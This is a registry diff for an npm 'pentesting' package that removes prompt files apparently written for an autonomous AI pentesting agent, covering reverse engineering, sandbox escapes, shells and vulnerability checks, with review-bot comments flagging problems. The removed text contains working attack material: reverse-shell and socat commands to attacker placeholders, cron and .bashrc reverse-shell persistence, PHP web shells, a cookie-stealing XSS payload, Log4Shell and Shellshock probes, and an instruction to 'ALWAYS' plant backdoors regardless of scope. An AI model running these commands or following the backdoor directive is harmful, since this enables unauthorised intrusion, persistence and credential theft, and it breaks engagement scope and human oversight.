pentesting 0.73.14 → 0.90.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (70)
  1. package/README.md +119 -49
  2. package/bin/pentesting.mjs +32 -0
  3. package/lib/runtime.mjs +419 -0
  4. package/package.json +17 -46
  5. package/scripts/postinstall.mjs +30 -0
  6. package/scripts/preflight-local.sh +24 -0
  7. package/dist/ad/prompt.md +0 -60
  8. package/dist/agent-tool-MMDCBQ74.js +0 -989
  9. package/dist/api/prompt.md +0 -63
  10. package/dist/chunk-4KLVUP3C.js +0 -11458
  11. package/dist/chunk-AEQNELCQ.js +0 -5930
  12. package/dist/chunk-YZNPWDNS.js +0 -1166
  13. package/dist/cloud/prompt.md +0 -49
  14. package/dist/container/prompt.md +0 -58
  15. package/dist/database/prompt.md +0 -58
  16. package/dist/email/prompt.md +0 -44
  17. package/dist/file-sharing/prompt.md +0 -56
  18. package/dist/ics/prompt.md +0 -76
  19. package/dist/main.d.ts +0 -1
  20. package/dist/main.js +0 -9737
  21. package/dist/network/prompt.md +0 -49
  22. package/dist/persistence-IGAKJZJ3.js +0 -13
  23. package/dist/process-registry-DNEZX4S5.js +0 -30
  24. package/dist/prompts/base.md +0 -436
  25. package/dist/prompts/ctf-crypto.md +0 -168
  26. package/dist/prompts/ctf-forensics.md +0 -182
  27. package/dist/prompts/ctf-pwn.md +0 -137
  28. package/dist/prompts/evasion.md +0 -215
  29. package/dist/prompts/exploit.md +0 -416
  30. package/dist/prompts/infra.md +0 -114
  31. package/dist/prompts/llm/analyst-system.md +0 -76
  32. package/dist/prompts/llm/context-extractor-system.md +0 -19
  33. package/dist/prompts/llm/input-processor-system.md +0 -64
  34. package/dist/prompts/llm/memory-synth-system.md +0 -14
  35. package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
  36. package/dist/prompts/llm/reflector-system.md +0 -16
  37. package/dist/prompts/llm/report-generator-system.md +0 -21
  38. package/dist/prompts/llm/strategist-fallback.md +0 -9
  39. package/dist/prompts/llm/triage-system.md +0 -47
  40. package/dist/prompts/main-agent.md +0 -193
  41. package/dist/prompts/offensive-playbook.md +0 -250
  42. package/dist/prompts/payload-craft.md +0 -181
  43. package/dist/prompts/post.md +0 -185
  44. package/dist/prompts/recon.md +0 -296
  45. package/dist/prompts/report.md +0 -98
  46. package/dist/prompts/strategist-system.md +0 -472
  47. package/dist/prompts/strategy.md +0 -163
  48. package/dist/prompts/techniques/README.md +0 -40
  49. package/dist/prompts/techniques/ad-attack.md +0 -261
  50. package/dist/prompts/techniques/auth-access.md +0 -256
  51. package/dist/prompts/techniques/container-escape.md +0 -103
  52. package/dist/prompts/techniques/crypto.md +0 -296
  53. package/dist/prompts/techniques/enterprise-pentest.md +0 -175
  54. package/dist/prompts/techniques/file-attacks.md +0 -144
  55. package/dist/prompts/techniques/forensics.md +0 -313
  56. package/dist/prompts/techniques/injection.md +0 -217
  57. package/dist/prompts/techniques/lateral.md +0 -128
  58. package/dist/prompts/techniques/network-svc.md +0 -229
  59. package/dist/prompts/techniques/pivoting.md +0 -205
  60. package/dist/prompts/techniques/privesc.md +0 -190
  61. package/dist/prompts/techniques/pwn.md +0 -595
  62. package/dist/prompts/techniques/reversing.md +0 -183
  63. package/dist/prompts/techniques/sandbox-escape.md +0 -73
  64. package/dist/prompts/techniques/shells.md +0 -194
  65. package/dist/prompts/vuln.md +0 -190
  66. package/dist/prompts/web.md +0 -318
  67. package/dist/prompts/zero-day.md +0 -298
  68. package/dist/remote-access/prompt.md +0 -52
  69. package/dist/web/prompt.md +0 -59
  70. package/dist/wireless/prompt.md +0 -62
@@ -1,183 +0,0 @@
1
- # Reverse Engineering Techniques
2
-
3
- ## Static Analysis — First Pass
4
- ```
5
- Automated recon on any binary:
6
- ├── file <binary> → architecture, linking, stripped?
7
- ├── strings <binary> | grep -iE 'flag|pass|key|secret|http'
8
- ├── strings -el <binary> → UTF-16 strings (Windows PE)
9
- ├── readelf -h <binary> → ELF header (entry point, type)
10
- ├── readelf -s <binary> → symbol table (if not stripped)
11
- ├── readelf -d <binary> → dynamic section (libraries)
12
- ├── objdump -d <binary> → full disassembly
13
- ├── objdump -t <binary> → symbol table
14
- ├── nm <binary> → list symbols
15
- ├── checksec --file=<binary> → protections (NX, PIE, Canary, RELRO)
16
- └── ldd <binary> → shared libraries
17
- ```
18
-
19
- ## Disassemblers & Decompilers
20
- ```
21
- Ghidra (free, NSA):
22
- ├── Auto-analysis on import → wait for completion
23
- ├── Symbol Tree → Functions → main, check_*, verify_*
24
- ├── Decompiler window → pseudo-C output
25
- ├── Patch bytes: Right-click → Patch Instruction
26
- ├── Scripting: Tools → Script Manager → Python/Java
27
- ├── Cross-references: Right-click → References → Find references to
28
- └── Data types: Right-click → Retype Variable → set correct type
29
-
30
- Radare2/rizin (CLI):
31
- ├── r2 -A <binary> → open with auto-analysis
32
- ├── afl → list functions
33
- ├── pdf @main → disassemble main
34
- ├── VV @main → visual graph mode
35
- ├── s <addr>; pd 20 → seek and disassemble
36
- ├── px 100 @<addr> → hex dump
37
- ├── iz → strings in data sections
38
- ├── axt <addr> → cross-references to address
39
- └── ood; dc → debug: reopen and continue
40
-
41
- IDA Free:
42
- ├── F5 → decompile to pseudo-C
43
- ├── X → cross-references
44
- ├── G → go to address
45
- ├── N → rename variable/function
46
- └── / → search text/bytes
47
- ```
48
-
49
- ## Dynamic Analysis
50
- ```
51
- GDB + GEF/pwndbg:
52
- ├── gdb -q ./<binary>
53
- ├── b *main → breakpoint at main
54
- ├── b *0x<addr> → breakpoint at address
55
- ├── r → run
56
- ├── ni / si → next instruction / step into
57
- ├── x/20gx $rsp → examine stack
58
- ├── x/s <addr> → examine as string
59
- ├── info registers → all registers
60
- ├── vmmap → memory mappings (GEF)
61
- ├── telescope $rsp 20 → smart stack view (pwndbg)
62
- ├── heap bins → heap state (pwndbg)
63
- └── set *<addr>=<value> → modify memory
64
-
65
- ltrace / strace:
66
- ├── ltrace ./<binary> → library calls (strcmp, malloc, puts)
67
- │ → strcmp("input", "s3cr3t") reveals the password directly!
68
- ├── strace ./<binary> → system calls (open, read, write)
69
- └── strace -e trace=open ./<binary> → filter specific syscalls
70
-
71
- Frida (runtime instrumentation):
72
- ├── frida -U -f <package> → Android/iOS attach
73
- ├── Interceptor.attach(addr, { onEnter(args) { ... }})
74
- ├── Module.findExportByName("libc.so", "strcmp")
75
- └── Java.perform(() => { ... }) → Java method hooking
76
- ```
77
-
78
- ## Anti-Reversing Bypass
79
- ```
80
- Common protections and bypasses:
81
- ├── UPX packing: upx -d <binary> → decompress
82
- ├── Custom packer: Dump from memory after self-unpacking
83
- │ ├── gdb: b *entry_after_unpack; dump memory out.bin 0x400000 0x600000
84
- │ └── Or use OllyDump / Scylla for PE files
85
- ├── Anti-debug (ptrace):
86
- │ ├── Check: ltrace → PTRACE_TRACEME call?
87
- │ ├── Bypass: LD_PRELOAD with fake ptrace returning 0
88
- │ ├── Or: gdb → catch syscall ptrace → set $rax=0 → continue
89
- │ └── Or: patch the ptrace call to NOP (0x90)
90
- ├── Obfuscation (control flow flattening):
91
- │ ├── Identify dispatcher pattern → trace actual execution path
92
- │ ├── Use symbolic execution: angr (Python)
93
- │ └── Script deobfuscation with Ghidra/IDA
94
- ├── Timing checks:
95
- │ ├── Patch rdtsc/time calls
96
- │ └── Hook time() to return constant
97
- └── VM-based protection:
98
- ├── Identify VM bytecode interpreter loop
99
- ├── Extract bytecode, build custom disassembler
100
- └── Often: switch-case on opcodes → map each opcode
101
- ```
102
-
103
- ## Symbolic Execution (angr)
104
- ```
105
- For complex crackmes with many branches:
106
-
107
- import angr
108
- import claripy
109
-
110
- proj = angr.Project('./<binary>', auto_load_libs=False)
111
- state = proj.factory.entry_state()
112
- simgr = proj.factory.simulation_manager(state)
113
-
114
- # Find state that reaches "Correct!" / avoid "Wrong!"
115
- simgr.explore(
116
- find=lambda s: b"Correct" in s.posix.dumps(1),
117
- avoid=lambda s: b"Wrong" in s.posix.dumps(1)
118
- )
119
-
120
- if simgr.found:
121
- solution = simgr.found[0]
122
- print(solution.posix.dumps(0)) # stdin that reaches "Correct"
123
- ```
124
-
125
- ## .NET / Java Decompilation
126
- ```
127
- .NET (C#):
128
- ├── dnSpy / ILSpy → full source code recovery
129
- ├── dotPeek (JetBrains) → decompile to C#
130
- ├── de4dot → deobfuscate .NET binaries
131
- ├── Edit method bodies directly in dnSpy → recompile
132
- └── Check: file <binary> → "PE32 executable ... Mono/.Net assembly"
133
-
134
- Java:
135
- ├── JD-GUI → decompile .class → .java
136
- ├── JADX → Android APK → Java source
137
- │ jadx -d output/ <file.apk>
138
- ├── CFR → modern Java decompiler (handles lambdas)
139
- │ java -jar cfr.jar <file.jar> --outputdir out/
140
- ├── procyon → another decompiler
141
- └── Unpack JAR: jar xf <file.jar> → get .class files
142
- ```
143
-
144
- ## Android / Mobile Reversing
145
- ```
146
- APK analysis:
147
- ├── apktool d <app.apk> → decompile resources + smali
148
- ├── jadx -d output/ <app.apk> → decompile to Java
149
- ├── unzip <app.apk> → raw contents (classes.dex, lib/)
150
- ├── dex2jar <classes.dex> → convert DEX to JAR
151
- ├── Check AndroidManifest.xml → permissions, activities, services
152
- ├── Search for: API keys, URLs, hardcoded secrets
153
- │ grep -ri 'api_key\|secret\|flag\|password' output/
154
- ├── Native libraries: lib/<arch>/*.so → Ghidra/IDA
155
- └── Frida for runtime: frida -U -f <package> --no-pause -l script.js
156
-
157
- iOS:
158
- ├── Clutch / bfinject → decrypt IPA from jailbroken device
159
- ├── class-dump → dump ObjC headers
160
- ├── Hopper / IDA → disassemble Mach-O
161
- └── Frida → runtime hooks on iOS
162
- ```
163
-
164
- ## Common CTF Rev Patterns
165
- ```
166
- Pattern recognition — what to look for:
167
- ├── Simple XOR: Key repeated over flag → XOR with known prefix "flag{"
168
- ├── Custom encoding: Lookup table → build inverse table
169
- ├── Matrix/math transform: Reverse the operations
170
- ├── Maze/game solver: Extract map → BFS/DFS algorithm
171
- ├── VM challenge: Custom bytecode → write disassembler → understand ops
172
- ├── Anti-debug + encrypted flag: Bypass anti-debug → let decryption run
173
- ├── Incremental check: Each char checked independently → brute force per char
174
- │ → Timing side-channel or ltrace strcmp
175
- ├── Z3/constraint solving: Model constraints → z3.Solver().check()
176
- │ from z3 import *
177
- │ s = Solver()
178
- │ flag = [BitVec(f'f{i}', 8) for i in range(32)]
179
- │ # Add constraints from decompiled code
180
- │ s.add(flag[0] == ord('f'), flag[1] == ord('l'), ...)
181
- │ s.check(); m = s.model()
182
- └── Angr for path explosion: When manual analysis is too slow
183
- ```
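Review bot: old line 16 lists ldd <binary> under "Automated recon on any binary", but ldd is not safe to run on an untrusted file: its man page warns that it can end up executing code from the program being inspected. Old line 11 (readelf -d <binary>) already reports the needed libraries without loading anything, so if this list is kept anywhere after the removal, drop the ldd entry or restrict it to trusted binaries. Separately, the Z3 fragment at old line 181 calls s.model() without testing that s.check() returned sat.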
@@ -1,73 +0,0 @@
1
- # Sandbox & Restricted Environment Escape Techniques
2
-
3
- ## Python Jail (pyjail)
4
- ```
5
- Bypass filter with builtins:
6
- ├── __builtins__.__import__('os').system('cat /flag')
7
- ├── eval(compile('import os; os.system("id")', '<x>', 'exec'))
8
- ├── Without import keyword:
9
- │ ().__class__.__bases__[0].__subclasses__()[N] → find os._wrap_close
10
- │ ''.__class__.__mro__[1].__subclasses__() → enumerate subclasses
11
- ├── Bypass char filters:
12
- │ chr(111)+chr(115) → 'os'
13
- │ getattr(__builtins__, '\x5f\x5fimport\x5f\x5f')('os')
14
- ├── eval/exec tricks:
15
- │ eval(bytes([105,109,112,111,114,116]).decode())
16
- │ exec('\x5f\x5fimport\x5f\x5f("os").system("sh")')
17
- └── breakpoint() → drops to pdb → import os
18
- ```
19
-
20
- ## PHP disable_functions Bypass
21
- ```
22
- ├── mail() + putenv(): LD_PRELOAD injection
23
- │ putenv("LD_PRELOAD=/tmp/evil.so"); mail('','','','');
24
- ├── FFI (PHP 7.4+): FFI::cdef() → call system()
25
- ├── imap_open(): with /norsh flag
26
- ├── imagick: LD_PRELOAD via MAGICK_CONFIGURE_PATH
27
- ├── pcntl_exec(): if not in disable list
28
- └── Chankro: bypass via LD_PRELOAD + sendmail
29
- ```
30
-
31
- ## Bash Restricted Shell Escape (rbash/rksh)
32
- ```
33
- ├── vi/vim → :!/bin/bash
34
- ├── awk 'BEGIN {system("/bin/bash")}'
35
- ├── python -c 'import pty; pty.spawn("/bin/bash")'
36
- ├── find / -exec /bin/bash \;
37
- ├── BASH_ENV, ENV, SHELLOPTS manipulation
38
- ├── cp /bin/bash /tmp/; /tmp/bash
39
- ├── ssh user@localhost -t bash
40
- └── Use any command that can spawn a subshell:
41
- less, more, man, nmap --interactive, ftp → !/bin/bash
42
- ```
43
-
44
- ## seccomp Bypass (Binary Exploitation)
45
- ```
46
- ├── Allowed syscalls only → use openat/read/write to read flag
47
- ├── open() banned → openat(AT_FDCWD, "/flag", O_RDONLY)
48
- ├── execve banned → ORW chain (open → read → write)
49
- ├── sendfile() as alternative to read+write
50
- └── Ret2dlresolve if seccomp applied after dynamic linking
51
- ```
52
-
53
- ## Docker / Container Escape
54
- ```
55
- See container-escape.md for full Docker/K8s escape techniques.
56
- ```
57
-
58
- ## chroot Escape
59
- ```
60
- ├── mkdir foo; chroot foo; cd ../../../../../../; chroot .
61
- ├── Open file descriptor to / before chroot, then fchdir
62
- ├── Mount /proc if available → access host filesystem
63
- └── Kernel exploit → bypass chroot entirely
64
- ```
65
-
66
- ## AppArmor / SELinux Bypass
67
- ```
68
- ├── Check profile: cat /proc/self/attr/current
69
- ├── AppArmor: aa-status, find unconfined processes
70
- ├── SELinux: getenforce, find permissive domains
71
- ├── Transition to unconfined context via allowed binary
72
- └── web_search("{apparmor|selinux} bypass {profile name}")
73
- ```
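Review bot: old line 72 ends the AppArmor / SELinux section with a templated web_search(...) call instead of reference content, so whatever the search returns becomes the agent's guidance with no statement that results are untrusted input. If this material is relocated rather than dropped, say explicitly that search results are reference only and are not to be executed as returned. Also, old lines 54-56 wrap a one-line prose cross-reference to container-escape.md in a code fence; that file is removed in the same release (entry 51 in the file list), so the pointer should not survive in any relocated copy.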
@@ -1,194 +0,0 @@
1
- # Shell Operations — Comprehensive Autonomous Guide
2
-
3
- > **§3 Minimal Specification**: This file is a **Bootstrap reference**, not a prescribed order.
4
- > Do NOT follow steps linearly. Use `get_owasp_knowledge`, `web_search`, and target observations
5
- > to decide what to test and in what order. Adapt dynamically — not to this list.
6
-
7
- > **Cross-ref**: exploit.md (initial access), post.md (post-exploitation), lateral.md (pivoting)
8
-
9
- ## Core Principle
10
- A shell is not the end — it's the BEGINNING. You must be able to:
11
- - Get a shell through ANY available language/binary on the target
12
- - Upgrade ANY dumb shell to a fully interactive PTY
13
- - Maintain shell access through disconnects and reboots
14
- - Transfer shells between listeners, ports, and protocols
15
-
16
- ## 📡 Reverse Shell — Exhaustive Category Map
17
-
18
- **There are 30+ ways to get a reverse shell. Search and try ALL that apply.**
19
-
20
- ### Decision Tree: Which Shell Technique?
21
- ```
22
- What languages/tools exist on target?
23
- ├── Python available? → Python reverse shell (most reliable)
24
- ├── Bash available? → Bash /dev/tcp reverse shell
25
- ├── PHP available? → PHP fsockopen/exec shell
26
- ├── Perl available? → Perl socket reverse shell
27
- ├── Ruby available? → Ruby socket reverse shell
28
- ├── Node.js? → Node child_process reverse shell
29
- ├── Java/Groovy? → Java Runtime.exec shell
30
- ├── Lua? → Lua socket shell
31
- ├── nc/ncat available? → Netcat -e or FIFO pipe method
32
- ├── socat available? → Socat encrypted PTY shell (BEST quality)
33
- ├── curl/wget? → Download shell script → execute
34
- ├── PowerShell? → PowerShell TCP client reverse shell
35
- ├── Certutil? → Windows download + execute
36
- ├── Nothing obvious? → Check: openssl, awk, telnet, xterm, msfvenom binary
37
- └── Web server only? → Web shell (PHP/JSP/ASP) → upgrade to reverse shell
38
- ```
39
-
40
- ### Autonomous Shell Search Protocol
41
- ```
42
- FOR EVERY target, do this:
43
- 1. web_search("reverse shell cheatsheet {language}")
44
- 2. browse_url("https://www.revshells.com") → generate shell for exact IP/PORT
45
- 3. web_search("{language} reverse shell one-liner")
46
- 4. If standard shells blocked → web_search("reverse shell without {blocked_tool}")
47
- 5. If ALL shells blocked → web_search("reverse shell alternative methods {OS}")
48
- 6. If outbound TCP blocked → try UDP, DNS, ICMP exfiltration shells
49
- 7. Build custom: write_file → python/bash/compiled binary → transfer and execute
50
- ```
51
-
52
- ### Shell Port Strategy
53
- ```
54
- If port 4444 blocked:
55
- ├── Try common allowed ports: 80, 443, 53, 8080, 8443
56
- ├── Try high ports: 9001, 9999, 31337
57
- ├── Use SSL-wrapped shell on 443 (looks like HTTPS traffic)
58
- ├── DNS shell on port 53 (often allowed through firewalls)
59
- ├── ICMP shell (no port needed, but requires root)
60
- └── Web-based shell (through existing HTTP connection)
61
- ```
62
-
63
- ## Shell Upgrade — From Dumb to Full PTY
64
-
65
- **CRITICAL: A dumb shell = incomplete access. ALWAYS upgrade.**
66
-
67
- ### Upgrade Decision Tree
68
- ```
69
- Got initial shell?
70
-
71
- ├── 1. Python PTY (try first):
72
- │ python3 -c 'import pty;pty.spawn("/bin/bash")'
73
- │ OR python -c 'import pty;pty.spawn("/bin/bash")'
74
-
75
- ├── 2. No Python? Try script:
76
- │ script -qc /bin/bash /dev/null
77
- │ OR script /dev/null -c bash
78
-
79
- ├── 3. No script? Try other spawners:
80
- │ perl -e 'exec "/bin/bash"'
81
- │ ruby -e 'exec "/bin/bash"'
82
- │ lua -e "os.execute('/bin/bash')"
83
- │ echo os.system('/bin/bash') (if in config file)
84
- │ /usr/bin/expect -c 'spawn bash; interact'
85
-
86
- ├── 4. After PTY spawn, do the FULL UPGRADE RITUAL:
87
- │ Ctrl+Z (background the shell)
88
- │ stty raw -echo; fg (on attacker machine)
89
- │ export TERM=xterm-256color
90
- │ export SHELL=/bin/bash
91
- │ stty rows XX columns YY (match your terminal size)
92
-
93
- ├── 5. Windows? Different approach:
94
- │ PowerShell → ConPTY technique
95
- │ rlwrap nc -lvnp PORT (at minimum for arrow keys)
96
- │ web_search("windows reverse shell upgrade conpty")
97
-
98
- └── 6. SOCAT for best quality (if available):
99
- Attacker: socat file:`tty`,raw,echo=0 tcp-listen:PORT
100
- Target: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER:PORT
101
- ```
102
-
103
- ### Shell Stabilization Troubleshooting
104
- ```
105
- Problem → Solution search pattern:
106
- ├── Shell dies on Ctrl+C → stty raw -echo not set → redo upgrade ritual
107
- ├── No tab completion → TERM not exported → export TERM=xterm
108
- ├── Can't run su/sudo → no PTY → must spawn PTY first
109
- ├── Garbled output → stty rows/columns wrong → check with stty -a on attacker
110
- ├── Shell disconnects → use tmux/screen on target for persistence
111
- ├── Can't transfer files → web_search("file transfer {OS} techniques hacktricks")
112
- └── Slow shell → background tasks blocking → check with jobs, use &
113
- ```
114
-
115
- ## 🌐 Web Shells — When Reverse Shell Won't Connect
116
-
117
- ```
118
- Decision tree:
119
- ├── PHP available?
120
- │ ├── Simple: <?php system($_GET['cmd']); ?>
121
- │ ├── Better: <?php echo shell_exec($_REQUEST['c']); ?>
122
- │ ├── Evasion: web_search("php web shell obfuscated bypass AV")
123
- │ ├── Full featured: web_search("p0wny shell php") or web_search("phpbash web shell")
124
- │ └── From webshell → upgrade to reverse shell (always try)
125
-
126
- ├── JSP available? (Tomcat, WebLogic, JBoss)
127
- │ └── web_search("jsp web shell cmd one liner")
128
-
129
- ├── ASP/ASPX available? (IIS)
130
- │ └── web_search("aspx web shell cmd")
131
-
132
- ├── Python WSGI/Django/Flask?
133
- │ └── SSTI → RCE (see injection.md)
134
-
135
- ├── Node.js/Express?
136
- │ └── web_search("node.js web shell reverse shell express")
137
-
138
- └── CGI/Perl?
139
- └── web_search("cgi perl web shell")
140
-
141
- UPLOAD METHODS:
142
- ├── File upload functionality → bypass filters (see file-attacks.md)
143
- ├── SQL injection → INTO OUTFILE → write shell to web directory
144
- ├── LFI + log poisoning → inject shell into log → include
145
- ├── Redis CONFIG SET dir → write shell to web root
146
- ├── FTP writable dir → upload shell (if FTP serves web dir)
147
- ├── RCE → echo/printf shell to web directory
148
- └── SSRF → write to local filesystem
149
- ```
150
-
151
- ## 🔌 Bind Shell (Alternative When Reverse Can't Connect)
152
- ```
153
- When target can't reach attacker (strict egress filtering):
154
- ├── Start listener on TARGET: nc -lvnp PORT -e /bin/bash
155
- ├── Connect FROM attacker: nc TARGET PORT
156
- ├── OR use socat: socat TCP-LISTEN:PORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid
157
- └── Problem: requires inbound port access (less common)
158
- ```
159
-
160
- ## 📡 Alternative Shell Channels
161
- ```
162
- When TCP reverse shell is completely blocked:
163
- ├── DNS shell: web_search("dnscat2 DNS reverse shell")
164
- ├── ICMP shell: web_search("icmpsh ICMP reverse shell")
165
- ├── HTTP shell: web_search("HTTP reverse shell python")
166
- ├── WebSocket shell: web_search("WebSocket reverse shell")
167
- ├── SSH tunnel shell: ssh -R port:localhost:22 attacker (reverse SSH)
168
- ├── Encrypted shell: openssl s_client / ncat --ssl
169
- └── Custom protocol: write a custom shell over any allowed protocol
170
- ```
171
-
172
- ## 🔒 Shell Persistence
173
- ```
174
- After getting shell, ALWAYS set up backup access:
175
- ├── SSH key injection: echo 'key' >> ~/.ssh/authorized_keys
176
- ├── Cron reverse shell: (crontab -l; echo '*/5 * * * * bash -i >& /dev/tcp/ATK/P 0>&1') | crontab -
177
- ├── Systemd service: write .service file with reverse shell ExecStart
178
- ├── .bashrc/.profile: append reverse shell command
179
- ├── Web shell backup: leave web shell in obscure directory
180
- ├── Windows: Registry Run key, Scheduled Task, WMI subscription
181
- ├── AND: web_search("{OS} persistence techniques hacktricks")
182
- └── Always have 2+ access methods before doing anything destructive
183
- ```
184
-
185
- ## Shell Recovery Protocol
186
- ```
187
- Shell died? Don't panic:
188
- 1. Did I set up persistence? → reconnect through backup method
189
- 2. Was there a web shell? → access through browser/curl
190
- 3. Do I have credentials? → SSH/RDP back in
191
- 4. Is the listener still running? → target still trying to connect (check nc listener)
192
- 5. None of the above? → re-exploit (go back to the vulnerability that gave initial access)
193
- 6. Vulnerability patched? → try a different vulnerability
194
- ```
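Review bot: the "Shell Persistence" block at old lines 174-182 tells the agent to ALWAYS add backup access (authorized_keys, cron, systemd, shell profiles, leftover web shells) with no condition on engagement scope and no requirement to record what was created, so nothing in the file supports cleanup or audit afterwards. Removing it is the right direction; any replacement should gate these actions on explicit authorization and log each artifact for removal. The header at old lines 3-5 ("Do NOT follow steps linearly") also contradicts old line 18 ("Search and try ALL that apply") and the numbered protocol at old lines 42-49.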
@@ -1,190 +0,0 @@
1
- # Vuln Agent — Vulnerability Verification Specialist
2
-
3
- ## Identity
4
- You are a vulnerability verification specialist. You verify known vulnerabilities against discovered services/versions.
5
- You eliminate false positives and confirm exploitability.
6
-
7
- ## Reference Rule
8
-
9
- This file is a vulnerability verification reference map.
10
-
11
- - It provides representative verification paths, not mandatory command scripts
12
- - Verification should preserve the distinction between tactic, technique, and concrete attempt
13
- - One failed PoC or scanner result does not automatically invalidate the broader technique
14
- - Confirmed evidence should shrink uncertainty, not encourage blind repetition
15
-
16
- ## Think → Act → Observe Loop
17
-
18
- Every turn, you must:
19
- 1. **Think** — which vulnerability is promising, how to verify it
20
- 2. **Act** — execute verification code, set up callback servers when needed
21
- 3. **Observe** — analyze results, determine confirmed/unconfirmed, move to next vulnerability
22
-
23
- ## Behavioral Principles
24
- - Automated scan → manual verification → PoC testing in order
25
- - Verified vulnerabilities are immediately recorded with add_finding
26
- - Must include CVSS and exploit availability
27
- - Verify Critical/High first, Low/Info later
28
- - **Self-correct on errors** — search with `web_search` when you don't know
29
-
30
- ## Verification Pipeline
31
-
32
- ### Phase 1: Automated Scanning
33
- ```bash
34
- # Nuclei — Critical/High only
35
- nuclei -u <target> -severity critical,high -silent -o .pentesting/workspace/nuclei-results.txt
36
-
37
- # Nikto — web server
38
- nikto -h <target> -C all -Format txt -output .pentesting/workspace/nikto.txt
39
-
40
- # testssl — TLS vulnerabilities
41
- testssl --severity HIGH <target>:443
42
- ```
43
-
44
- ### Phase 2: CVE Search
45
- ```bash
46
- # searchsploit
47
- searchsploit "<service> <version>"
48
- searchsploit --id <exploit_id> # detailed check
49
-
50
- # Metasploit module check
51
- msfconsole -q -x "search type:exploit <service>; exit"
52
- ```
53
-
54
- ### Phase 3: Manual Verification
55
-
56
- **Web vulnerabilities:**
57
- ```bash
58
- # Path Traversal / LFI (Apache 2.4.49)
59
- curl --path-as-is "http://<target>/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
60
-
61
- # LFI
62
- curl "http://<target>/page?file=../../../../etc/passwd"
63
- curl "http://<target>/page?file=....//....//....//etc/passwd"
64
- curl "http://<target>/page?file=php://filter/convert.base64-encode/resource=/etc/passwd"
65
-
66
- # RFI (payload server needed)
67
- # 1. Start payload server
68
- run_cmd({ command: "python3 -m http.server 8888 -d .pentesting/workspace", background: true })
69
- # 2. RFI test
70
- curl "http://<target>/page?file=http://MYIP:8888/test.php"
71
- # 3. Check results then clean up server
72
-
73
- # SQLi basic test
74
- sqlmap -u "http://<target>/page?id=1" --batch --risk=1 --level=1
75
-
76
- # SSTI
77
- curl "http://<target>/page?name={{7*7}}"
78
-
79
- # SSRF (OOB verification needed)
80
- # → see OOB testing section below
81
- ```
82
-
83
- ### Phase 3.5: OOB (Out-of-Band) / Blind Vulnerability Verification
84
-
85
- SSRF, Blind XSS, XXE, and other vulnerabilities that don't appear directly in the response
86
- require opening a **callback server** and checking whether the target connects.
87
-
88
- **OOB Callback Server Pattern:**
89
- ```
90
- Step 1: Check attacker IP
91
- → run_cmd({ command: "hostname -I | awk '{print $1}'" })
92
-
93
- Step 2: Start callback receiver
94
- → run_cmd({ command: "nc -lvnp 9999", background: true })
95
- → returns: process_id
96
-
97
- Step 3: Send OOB payload
98
- → Insert http://MYIP:9999/TAG in each vulnerability's payload
99
-
100
- Step 4: Check for reception
101
- → bg_process({ action: "status", process_id: "..." })
102
- → HTTP request in stdout → vulnerability confirmed!
103
-
104
- Step 5: Clean up
105
- → bg_process({ action: "stop", process_id: "..." })
106
- ```
107
-
108
- **Blind XSS:**
109
- ```
110
- 1. run_cmd({ command: "nc -lvnp 9999", background: true })
111
- 2. Payload: <img src=http://MYIP:9999/blind_xss_hit>
112
- 3. Or: <script>new Image().src='http://MYIP:9999/'+document.cookie</script>
113
- 4. Check bg_process status → received = Stored XSS confirmed
114
- ```
115
-
116
- **SSRF:**
117
- ```
118
- 1. run_cmd({ command: "python3 -m http.server 9090", background: true })
119
- 2. curl "http://<target>/fetch?url=http://MYIP:9090/ssrf_test"
120
- 3. bg_process status → HTTP request reception confirmed
121
- ```
122
-
123
- **XXE:**
124
- ```
125
- 1. run_cmd({ command: "nc -lvnp 9999", background: true })
126
- 2. XXE payload:
127
- <?xml version="1.0"?>
128
- <!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://MYIP:9999/xxe_hit">]>
129
- <root>&xxe;</root>
130
- 3. bg_process status → connection reception confirmed
131
- ```
132
-
133
- **Log4Shell:**
134
- ```
135
- 1. run_cmd({ command: "nc -lvnp 1389", background: true })
136
- 2. curl -H "X-Forwarded-For: ${jndi:ldap://MYIP:1389/test}" http://<target>/
137
- 3. bg_process status → LDAP connection reception confirmed
138
- ```
139
-
140
- **Server vulnerabilities:**
141
- ```bash
142
- # MS17-010 (EternalBlue)
143
- nmap -Pn -p 445 --script smb-vuln-ms17-010 <target>
144
-
145
- # BlueKeep (CVE-2019-0708)
146
- nmap -Pn -p 3389 --script rdp-vuln-ms12-020 <target>
147
-
148
- # ShellShock
149
- curl -H "User-Agent: () { :; }; echo; /usr/bin/id" http://<target>/cgi-bin/test.cgi
150
- ```
151
-
152
- **Authentication/Access:**
153
- ```bash
154
- # Default credentials
155
- hydra -L /usr/share/seclists/Usernames/default-usernames.txt -P /usr/share/seclists/Passwords/default-passwords.txt <target> <service>
156
-
157
- # Anonymous FTP
158
- ftp -n <target> <<< "user anonymous
159
- pass anonymous@
160
- ls
161
- quit"
162
-
163
- # Redis unauthenticated
164
- redis-cli -h <target> INFO
165
- ```
166
-
167
- ## Severity Criteria
168
-
169
- | Severity | Condition | Example |
170
- |----------|-----------|---------|
171
- | **Critical** | RCE, auth bypass+admin, SQLi (data extraction) | CVE-2021-41773, Log4Shell |
172
- | **High** | LFI/RFI, Stored XSS, SSRF (internal access) | Auth bypass, file upload |
173
- | **Medium** | Reflected XSS, CSRF, info disclosure | Directory listing |
174
- | **Low** | Missing headers, CORS, Clickjacking | Missing security headers |
175
-
176
- ## Verification Report Format
177
- ```
178
- [vuln] CVE-2021-41773 — Apache Path Traversal
179
- [severity] CRITICAL (CVSS 9.8)
180
- [target] 10.10.10.1:80
181
- [verified] TRUE
182
- [evidence] curl --path-as-is ... → /etc/passwd contents readable
183
- [exploit] Exploit-DB #50183 / Metasploit apache_path_norm_rce
184
- [action] Recommend delegating RCE to exploit agent
185
- ```
186
-
187
- ## SharedState Access
188
- ```typescript
189
- { scope, targets, findings }
190
- ```
